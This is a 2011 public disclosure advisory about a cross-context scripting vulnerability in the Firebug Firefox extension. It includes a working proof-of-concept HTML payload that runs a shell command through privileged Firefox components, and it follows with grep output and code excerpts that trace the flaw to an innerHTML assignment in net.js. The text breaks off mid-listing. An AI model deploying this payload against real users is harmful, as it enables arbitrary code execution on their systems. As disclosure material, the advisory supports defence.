http://www.80vul.com/firefox/Firebug%20Firefox%20Extension%20Cross%20Context%20Scripting%20Vulnerability.htm
*Firebug Firefox Extension Cross Context Scripting Vulnerability*
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
2011/06/18 - Public Disclosure
*Description*
80vul.com discovered firebug that a famous firefox extension is vulnerable
to Cross Context Scripting, and this vul can execute evil codz in the chrome
privileged Firefox zone.so successful exploitation allows execution of
arbitrary code in user�s system.
*Exploitation*
a demo : http://www.80vul.com/firefox/firebug0day.htm
<html>
<head>firebug 0day</head>
<body>
<img src=2 onerror='var file = Components.classes["@mozilla.org/file/local;1
"].createInstance(Components.interfaces.nsILocalFile);file.initWithPath
("/bin/sh");var process =Components.classes["@mozilla.org/process/util;1"].
createInstance(Components.interfaces.nsIProcess);process.init(file);var
args= ["-c", "
gcalctool"];process.run(false, args, args.length);'></img>
</body>
</html>
Open the firebug, and visite the exploit's URL, then open "NET"
-->URL-->"HTML" , and gcalctool is executed.
*Analysis*
extract the code from firebug@software.joehewitt.com.xpi by rar or zip .
then let�s go ...
80vul@ubuntu:~$ grep -in 'body.innerHTML' -r ./
firebug@software.joehewitt.com/ --colour
./firebug@software.joehewitt.com/content/firebug/traceModule.js:1128:
iframe.contentWindow.document.body.innerHTML = text;
./firebug@software.joehewitt.com/content/firebug/net.js:2561:
iframe.contentWindow.document.body.innerHTML = text;
80vul@ubuntu:~$ grep -in 'body.innerHTML' -r ./
firebug@software.joehewitt.com/content/firebug/net.js --colour -8
2553- }
2554-
2555- if (hasClass(tab, "netInfoHtmlTab") && file.loaded && !
netInfoBox.htmlPresented)
2556- {
2557- netInfoBox.htmlPresented = true;
2558-
2559- var text = Utils.getResponseText(file, context);
2560- var iframe = netInfoBox.getElementsByClassName("
netInfoHtmlPreview").item(0);
2561: iframe.contentWindow.document.body.innerHTML = text;
2562- }
2563-
2564- // Notify listeners about update so, content of custom tabs can
be updated.
2565- dispatch(NetInfoBody.fbListeners, "updateTabBody", [netInfoBox,
file, context]);
2566- },
2567-
2568- setResponseText: function(file, netInfoBox, responseTextBox,
context)
2569- {
edit the content/firebug/net.js and seach "netInfoHtmlTab":
80vul@ubuntu:~$ gedit ./
firebug@software.joehewitt.com/content/firebug/net.js
Firebug.NetMonitor.NetInfoBody = domplate(Firebug.Rep, new Firebug.Listener
(),
{
tag:
DIV({"class": "netInfoBody", _repObject: "$file"},
TAG("$infoTabs", {file: "$file"}),
TAG("$infoBodies", {file: "$file"})
),
infoTabs:
DIV({"class": "netInfoTabs focusRow subFocusRow", "role": "tablist
"},
A({"class": "netInfoParamsTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",
view: "Params",
$collapsed: "$file|hideParams"},
$STR("URLParameters")
),
A({"class": "netInfoHeadersTab netInfoTab a11yFocus", onclick:
"$onClickTab", "role": "tab",
view: "Headers"},
$STR("Headers")
),
A({"class": "netInfoPostTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",
view: "Post",
$collapsed: "$file|hidePost"},
$STR("Post")
),
A({"class": "netInfoPutTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",
view: "Put",
$collapsed: "$file|hidePut"},
$STR("Put")
),
A({"class": "netInfoResponseTab netInfoTab a11yFocus", onclick:
"$onClickTab", "role": "tab",
view: "Response",
$collapsed: "$file|hideResponse"},
$STR("Response")
),
A({"class": "netInfoCacheTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",
view: "Cache",
$collapsed: "$file|hideCache"},
$STR("Cache")
),
A({"class": "netInfoHtmlTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",
view: "Html",
$collapsed: "$file|hideHtml"},
$STR("HTML")
)
),
hitest
